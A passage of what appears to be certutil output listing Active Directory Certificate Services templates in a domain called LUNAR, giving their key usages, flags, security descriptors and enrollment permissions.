  431. Allow Enroll LUNAR\Domain Admins
  432. Allow Enroll LUNAR\Enterprise Admins
  433. Allow Full Control LUNAR\Domain Admins
  434. Allow Full Control LUNAR\Enterprise Admins
  435. Allow Read NT AUTHORITY\Authenticated Users
  436. TemplatePropExtensions =
  437. 3 Extensions:
  438. Extension[0]:
  439. 1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2b
  440. Certificate Template Information
  441. Template=Cross Certification Authority(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.25)
  442. Major Version Number=105
  443. Minor Version Number=0
  444. Extension[1]:
  445. 2.5.29.15: Flags = 1(Critical), Length = 4
  446. Key Usage
  447. Digital Signature, Certificate Signing, Off-line CRL Signing, CRL Signing (86)
  448. Extension[2]:
  449. 2.5.29.19: Flags = 1(Critical), Length = 5
  450. Basic Constraints
  451. Subject Type=CA
  452. Path Length Constraint=None
  453. TemplatePropValidityPeriod = 5 Years
  454. TemplatePropRenewalPeriod = 6 Weeks
  455. Template[8]:
  456. TemplatePropCommonName = DirectoryEmailReplication
  457. TemplatePropFriendlyName = Directory Email Replication
  458. TemplatePropEKUs =
  459. 1 ObjectIds:
  460. 1.3.6.1.4.1.311.21.19 Directory Service Email Replication
  461. TemplatePropCryptoProviders =
  462. 0: Microsoft RSA SChannel Cryptographic Provider
  463. TemplatePropMajorRevision = 73 (115)
  464. TemplatePropDescription = Directory e-mail replication
  465. TemplatePropSchemaVersion = 2
  466. TemplatePropMinorRevision = 0
  467. TemplatePropRASignatureCount = 0
  468. TemplatePropMinimumKeySize = 800 (2048)
  469. TemplatePropOID =
  470. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.29 Directory Email Replication
  471. TemplatePropSupersede =
  472. 0: DomainController
  473. TemplatePropV1ApplicationPolicy =
  474. 1 ObjectIds:
  475. 1.3.6.1.4.1.311.21.19 Directory Service Email Replication
  476. TemplatePropEnrollmentFlags = 29 (41)
  477. CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1
  478. CT_FLAG_PUBLISH_TO_DS -- 8
  479. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  480. TemplatePropSubjectNameFlags = 9000000 (150994944)
  481. CT_FLAG_SUBJECT_ALT_REQUIRE_DIRECTORY_GUID -- 1000000 (16777216)
  482. CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)
  483. TemplatePropPrivateKeyFlags = 0
  484. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  485. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  486. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  487. TemplatePropGeneralFlags = 10060 (65632)
  488. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  489. CT_FLAG_MACHINE_TYPE -- 40 (64)
  490. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  491. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-498)(OA;;RPCR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;S-1-5-21-3330634377-1326264276-632209373-498)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DD)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(OA;;RPWPCR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;DD)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;ED)(OA;;RPWPCR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;ED)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  492. Allow Enroll LUNAR\Enterprise Read-only Domain Controllers
  493. Allow Auto-Enroll LUNAR\Enterprise Read-only Domain Controllers
  494. Allow Enroll LUNAR\Domain Admins
  495. Allow Enroll LUNAR\Domain Controllers
  496. Allow Enroll LUNAR\Enterprise Admins
  497. Allow Auto-Enroll LUNAR\Domain Controllers
  498. Allow Enroll NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
  499. Allow Auto-Enroll NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
  500. Allow Full Control LUNAR\Domain Admins
  501. Allow Full Control LUNAR\Enterprise Admins
  502. Allow Read NT AUTHORITY\Authenticated Users
  503. TemplatePropExtensions =
  504. 4 Extensions:
  505. Extension[0]:
  506. 1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2b
  507. Certificate Template Information
  508. Template=Directory Email Replication(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.29)
  509. Major Version Number=115
  510. Minor Version Number=0
  511. Extension[1]:
  512. 2.5.29.37: Flags = 0, Length = d
  513. Enhanced Key Usage
  514. Directory Service Email Replication (1.3.6.1.4.1.311.21.19)
  515. Extension[2]:
  516. 2.5.29.15: Flags = 1(Critical), Length = 4
  517. Key Usage
  518. Digital Signature, Key Encipherment (a0)
  519. Extension[3]:
  520. 1.3.6.1.4.1.311.21.10: Flags = 0, Length = f
  521. Application Policies
  522. [1]Application Certificate Policy:
  523. Policy Identifier=Directory Service Email Replication
  524. TemplatePropValidityPeriod = 1 Years
  525. TemplatePropRenewalPeriod = 6 Weeks
  526. Template[9]:
  527. TemplatePropCommonName = DomainController
  528. TemplatePropFriendlyName = Domain Controller
  529. TemplatePropEKUs =
  530. 2 ObjectIds:
  531. 1.3.6.1.5.5.7.3.2 Client Authentication
  532. 1.3.6.1.5.5.7.3.1 Server Authentication
  533. TemplatePropCryptoProviders =
  534. 0: Microsoft RSA SChannel Cryptographic Provider
  535. TemplatePropMajorRevision = 4
  536. TemplatePropDescription = Directory e-mail replication
  537. TemplatePropSchemaVersion = 1
  538. TemplatePropMinorRevision = 1
  539. TemplatePropRASignatureCount = 0
  540. TemplatePropMinimumKeySize = 800 (2048)
  541. TemplatePropOID =
  542. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.15
  543. TemplatePropEnrollmentFlags = 29 (41)
  544. CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1
  545. CT_FLAG_PUBLISH_TO_DS -- 8
  546. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  547. TemplatePropSubjectNameFlags = 19000000 (419430400)
  548. CT_FLAG_SUBJECT_ALT_REQUIRE_DIRECTORY_GUID -- 1000000 (16777216)
  549. CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)
  550. CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN -- 10000000 (268435456)
  551. TemplatePropPrivateKeyFlags = 0
  552. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  553. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  554. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  555. TemplatePropGeneralFlags = 1026c (66156)
  556. CT_FLAG_ADD_OBJ_GUID -- 4
  557. CT_FLAG_PUBLISH_TO_DS -- 8
  558. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  559. CT_FLAG_MACHINE_TYPE -- 40 (64)
  560. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  561. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  562. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-498)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DD)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;ED)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  563. Allow Enroll LUNAR\Enterprise Read-only Domain Controllers
  564. Allow Enroll LUNAR\Domain Admins
  565. Allow Enroll LUNAR\Domain Controllers
  566. Allow Enroll LUNAR\Enterprise Admins
  567. Allow Enroll NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
  568. Allow Full Control LUNAR\Domain Admins
  569. Allow Full Control LUNAR\Enterprise Admins
  570. Allow Read NT AUTHORITY\Authenticated Users
  571. TemplatePropExtensions =
  572. 3 Extensions:
  573. Extension[0]:
  574. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 22
  575. Certificate Template Name (Certificate Type)
  576. DomainController
  577. Extension[1]:
  578. 2.5.29.37: Flags = 0, Length = 16
  579. Enhanced Key Usage
  580. Client Authentication (1.3.6.1.5.5.7.3.2)
  581. Server Authentication (1.3.6.1.5.5.7.3.1)
  582. Extension[2]:
  583. 2.5.29.15: Flags = 1(Critical), Length = 4
  584. Key Usage
  585. Digital Signature, Key Encipherment (a0)
  586. TemplatePropValidityPeriod = 1 Years
  587. TemplatePropRenewalPeriod = 6 Weeks
  588. Template[10]:
  589. TemplatePropCommonName = DomainControllerAuthentication
  590. TemplatePropFriendlyName = Domain Controller Authentication
  591. TemplatePropEKUs =
  592. 3 ObjectIds:
  593. 1.3.6.1.5.5.7.3.2 Client Authentication
  594. 1.3.6.1.5.5.7.3.1 Server Authentication
  595. 1.3.6.1.4.1.311.20.2.2 Smart Card Logon
  596. TemplatePropCryptoProviders =
  597. 0: Microsoft RSA SChannel Cryptographic Provider
  598. TemplatePropMajorRevision = 6e (110)
  599. TemplatePropDescription = Computer
  600. TemplatePropSchemaVersion = 2
  601. TemplatePropMinorRevision = 0
  602. TemplatePropRASignatureCount = 0
  603. TemplatePropMinimumKeySize = 800 (2048)
  604. TemplatePropOID =
  605. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.28 Domain Controller Authentication
  606. TemplatePropSupersede =
  607. 0: DomainController
  608. TemplatePropV1ApplicationPolicy =
  609. 3 ObjectIds:
  610. 1.3.6.1.5.5.7.3.2 Client Authentication
  611. 1.3.6.1.5.5.7.3.1 Server Authentication
  612. 1.3.6.1.4.1.311.20.2.2 Smart Card Logon
  613. TemplatePropEnrollmentFlags = 20 (32)
  614. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  615. TemplatePropSubjectNameFlags = 8000000 (134217728)
  616. CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)
  617. TemplatePropPrivateKeyFlags = 0
  618. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  619. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  620. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  621. TemplatePropGeneralFlags = 10060 (65632)
  622. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  623. CT_FLAG_MACHINE_TYPE -- 40 (64)
  624. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  625. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-498)(OA;;RPCR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;S-1-5-21-3330634377-1326264276-632209373-498)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DD)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(OA;;RPWPCR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;DD)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;ED)(OA;;RPWPCR;a05b8cc2-17bc-4802-a710-e7c15ab866a2;;ED)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  626. Allow Enroll LUNAR\Enterprise Read-only Domain Controllers
  627. Allow Auto-Enroll LUNAR\Enterprise Read-only Domain Controllers
  628. Allow Enroll LUNAR\Domain Admins
  629. Allow Enroll LUNAR\Domain Controllers
  630. Allow Enroll LUNAR\Enterprise Admins
  631. Allow Auto-Enroll LUNAR\Domain Controllers
  632. Allow Enroll NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
  633. Allow Auto-Enroll NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
  634. Allow Full Control LUNAR\Domain Admins
  635. Allow Full Control LUNAR\Enterprise Admins
  636. Allow Read NT AUTHORITY\Authenticated Users
  637. TemplatePropExtensions =
  638. 4 Extensions:
  639. Extension[0]:
  640. 1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2b
  641. Certificate Template Information
  642. Template=Domain Controller Authentication(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.28)
  643. Major Version Number=110
  644. Minor Version Number=0
  645. Extension[1]:
  646. 2.5.29.37: Flags = 0, Length = 22
  647. Enhanced Key Usage
  648. Client Authentication (1.3.6.1.5.5.7.3.2)
  649. Server Authentication (1.3.6.1.5.5.7.3.1)
  650. Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
  651. Extension[2]:
  652. 2.5.29.15: Flags = 1(Critical), Length = 4
  653. Key Usage
  654. Digital Signature, Key Encipherment (a0)
  655. Extension[3]:
  656. 1.3.6.1.4.1.311.21.10: Flags = 0, Length = 28
  657. Application Policies
  658. [1]Application Certificate Policy:
  659. Policy Identifier=Client Authentication
  660. [2]Application Certificate Policy:
  661. Policy Identifier=Server Authentication
  662. [3]Application Certificate Policy:
  663. Policy Identifier=Smart Card Logon
  664. TemplatePropValidityPeriod = 1 Years
  665. TemplatePropRenewalPeriod = 6 Weeks
  666. Template[11]:
  667. TemplatePropCommonName = EFSRecovery
  668. TemplatePropFriendlyName = EFS Recovery Agent
  669. TemplatePropEKUs =
  670. 1 ObjectIds:
  671. 1.3.6.1.4.1.311.10.3.4.1 File Recovery
  672. TemplatePropCryptoProviders =
  673. 0: Microsoft Enhanced Cryptographic Provider v1.0
  674. 1: Microsoft Base Cryptographic Provider v1.0
  675. TemplatePropMajorRevision = 6
  676. TemplatePropDescription = User
  677. TemplatePropSchemaVersion = 1
  678. TemplatePropMinorRevision = 1
  679. TemplatePropRASignatureCount = 0
  680. TemplatePropMinimumKeySize = 800 (2048)
  681. TemplatePropOID =
  682. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.8
  683. TemplatePropEnrollmentFlags = 21 (33)
  684. CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1
  685. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  686. TemplatePropSubjectNameFlags = 82000000 (-2113929216)
  687. CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)
  688. CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)
  689. TemplatePropPrivateKeyFlags = 10 (16)
  690. CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)
  691. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  692. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  693. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  694. TemplatePropGeneralFlags = 10230 (66096)
  695. CT_FLAG_EXPORTABLE_KEY -- 10 (16)
  696. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  697. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  698. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  699. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  700. Allow Enroll LUNAR\Domain Admins
  701. Allow Enroll LUNAR\Enterprise Admins
  702. Allow Full Control LUNAR\Domain Admins
  703. Allow Full Control LUNAR\Enterprise Admins
  704. Allow Read NT AUTHORITY\Authenticated Users
  705. TemplatePropExtensions =
  706. 3 Extensions:
  707. Extension[0]:
  708. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 18
  709. Certificate Template Name (Certificate Type)
  710. EFSRecovery
  711. Extension[1]:
  712. 2.5.29.37: Flags = 0, Length = f
  713. Enhanced Key Usage
  714. File Recovery (1.3.6.1.4.1.311.10.3.4.1)
  715. Extension[2]:
  716. 2.5.29.15: Flags = 1(Critical), Length = 4
  717. Key Usage
  718. Key Encipherment (20)
  719. TemplatePropValidityPeriod = 5 Years
  720. TemplatePropRenewalPeriod = 6 Weeks
  721. Template[12]:
  722. TemplatePropCommonName = EnrollmentAgent
  723. TemplatePropFriendlyName = Enrollment Agent
  724. TemplatePropEKUs =
  725. 1 ObjectIds:
  726. 1.3.6.1.4.1.311.20.2.1 Certificate Request Agent
  727. TemplatePropCryptoProviders =
  728. 0: Microsoft Enhanced Cryptographic Provider v1.0
  729. 1: Microsoft Base Cryptographic Provider v1.0
  730. 2: Microsoft Base DSS Cryptographic Provider
  731. TemplatePropMajorRevision = 4
  732. TemplatePropDescription = User
  733. TemplatePropSchemaVersion = 1
  734. TemplatePropMinorRevision = 1
  735. TemplatePropRASignatureCount = 0
  736. TemplatePropMinimumKeySize = 800 (2048)
  737. TemplatePropOID =
  738. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.11
  739. TemplatePropEnrollmentFlags = 20 (32)
  740. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  741. TemplatePropSubjectNameFlags = 82000000 (-2113929216)
  742. CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)
  743. CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)
  744. TemplatePropPrivateKeyFlags = 0
  745. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  746. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  747. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  748. TemplatePropGeneralFlags = 10220 (66080)
  749. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  750. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  751. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  752. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  753. Allow Enroll LUNAR\Domain Admins
  754. Allow Enroll LUNAR\Enterprise Admins
  755. Allow Full Control LUNAR\Domain Admins
  756. Allow Full Control LUNAR\Enterprise Admins
  757. Allow Read NT AUTHORITY\Authenticated Users
  758. TemplatePropExtensions =
  759. 3 Extensions:
  760. Extension[0]:
  761. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 20
  762. Certificate Template Name (Certificate Type)
  763. EnrollmentAgent
  764. Extension[1]:
  765. 2.5.29.37: Flags = 0, Length = e
  766. Enhanced Key Usage
  767. Certificate Request Agent (1.3.6.1.4.1.311.20.2.1)
  768. Extension[2]:
  769. 2.5.29.15: Flags = 1(Critical), Length = 4
  770. Key Usage
  771. Digital Signature (80)
  772. TemplatePropValidityPeriod = 2 Years
  773. TemplatePropRenewalPeriod = 6 Weeks
  774. Template[13]:
  775. TemplatePropCommonName = MachineEnrollmentAgent
  776. TemplatePropFriendlyName = Enrollment Agent (Computer)
  777. TemplatePropEKUs =
  778. 1 ObjectIds:
  779. 1.3.6.1.4.1.311.20.2.1 Certificate Request Agent
  780. TemplatePropCryptoProviders =
  781. 0: Microsoft Enhanced Cryptographic Provider v1.0
  782. 1: Microsoft Base Cryptographic Provider v1.0
  783. 2: Microsoft Base DSS Cryptographic Provider
  784. TemplatePropMajorRevision = 5
  785. TemplatePropDescription = Computer
  786. TemplatePropSchemaVersion = 1
  787. TemplatePropMinorRevision = 1
  788. TemplatePropRASignatureCount = 0
  789. TemplatePropMinimumKeySize = 800 (2048)
  790. TemplatePropOID =
  791. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.13
  792. TemplatePropEnrollmentFlags = 20 (32)
  793. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  794. TemplatePropSubjectNameFlags = 18000000 (402653184)
  795. CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)
  796. CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN -- 10000000 (268435456)
  797. TemplatePropPrivateKeyFlags = 0
  798. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  799. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  800. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  801. TemplatePropGeneralFlags = 10260 (66144)
  802. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  803. CT_FLAG_MACHINE_TYPE -- 40 (64)
  804. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  805. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  806. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  807. Allow Enroll LUNAR\Domain Admins
  808. Allow Enroll LUNAR\Enterprise Admins
  809. Allow Full Control LUNAR\Domain Admins
  810. Allow Full Control LUNAR\Enterprise Admins
  811. Allow Read NT AUTHORITY\Authenticated Users
  812. TemplatePropExtensions =
  813. 3 Extensions:
  814. Extension[0]:
  815. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 2e
  816. Certificate Template Name (Certificate Type)
  817. MachineEnrollmentAgent
  818. Extension[1]:
  819. 2.5.29.37: Flags = 0, Length = e
  820. Enhanced Key Usage
  821. Certificate Request Agent (1.3.6.1.4.1.311.20.2.1)
  822. Extension[2]:
  823. 2.5.29.15: Flags = 1(Critical), Length = 4
  824. Key Usage
  825. Digital Signature (80)
  826. TemplatePropValidityPeriod = 2 Years
  827. TemplatePropRenewalPeriod = 6 Weeks
  828. Template[14]:
  829. TemplatePropCommonName = EnrollmentAgentOffline
  830. TemplatePropFriendlyName = Exchange Enrollment Agent (Offline request)
  831. TemplatePropEKUs =
  832. 1 ObjectIds:
  833. 1.3.6.1.4.1.311.20.2.1 Certificate Request Agent
  834. TemplatePropCryptoProviders =
  835. 0: Microsoft Enhanced Cryptographic Provider v1.0
  836. 1: Microsoft Base Cryptographic Provider v1.0
  837. 2: Microsoft Base DSS Cryptographic Provider
  838. TemplatePropMajorRevision = 4
  839. TemplatePropDescription = User
  840. TemplatePropSchemaVersion = 1
  841. TemplatePropMinorRevision = 1
  842. TemplatePropRASignatureCount = 0
  843. TemplatePropMinimumKeySize = 800 (2048)
  844. TemplatePropOID =
  845. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.12
  846. TemplatePropEnrollmentFlags = 0
  847. TemplatePropSubjectNameFlags = 1
  848. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  849. TemplatePropPrivateKeyFlags = 0
  850. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  851. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  852. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  853. TemplatePropGeneralFlags = 10201 (66049)
  854. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  855. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  856. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  857. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  858. Allow Enroll LUNAR\Domain Admins
  859. Allow Enroll LUNAR\Enterprise Admins
  860. Allow Full Control LUNAR\Domain Admins
  861. Allow Full Control LUNAR\Enterprise Admins
  862. Allow Read NT AUTHORITY\Authenticated Users
  863. TemplatePropExtensions =
  864. 3 Extensions:
  865. Extension[0]:
  866. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 2e
  867. Certificate Template Name (Certificate Type)
  868. EnrollmentAgentOffline
  869. Extension[1]:
  870. 2.5.29.37: Flags = 0, Length = e
  871. Enhanced Key Usage
  872. Certificate Request Agent (1.3.6.1.4.1.311.20.2.1)
  873. Extension[2]:
  874. 2.5.29.15: Flags = 1(Critical), Length = 4
  875. Key Usage
  876. Digital Signature (80)
  877. TemplatePropValidityPeriod = 2 Years
  878. TemplatePropRenewalPeriod = 6 Weeks
  879. Template[15]:
  880. TemplatePropCommonName = ExchangeUserSignature
  881. TemplatePropFriendlyName = Exchange Signature Only
  882. TemplatePropEKUs =
  883. 1 ObjectIds:
  884. 1.3.6.1.5.5.7.3.4 Secure Email
  885. TemplatePropCryptoProviders =
  886. 0: Microsoft Enhanced Cryptographic Provider v1.0
  887. 1: Microsoft Base Cryptographic Provider v1.0
  888. 2: Microsoft Base DSS Cryptographic Provider
  889. TemplatePropMajorRevision = 6
  890. TemplatePropDescription = User
  891. TemplatePropSchemaVersion = 1
  892. TemplatePropMinorRevision = 1
  893. TemplatePropRASignatureCount = 0
  894. TemplatePropMinimumKeySize = 800 (2048)
  895. TemplatePropOID =
  896. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.24
  897. TemplatePropEnrollmentFlags = 0
  898. TemplatePropSubjectNameFlags = 1
  899. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  900. TemplatePropPrivateKeyFlags = 0
  901. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  902. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  903. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  904. TemplatePropGeneralFlags = 10201 (66049)
  905. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  906. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  907. CT_FLAG_IS_DEFAULT -- 10000 (65536)
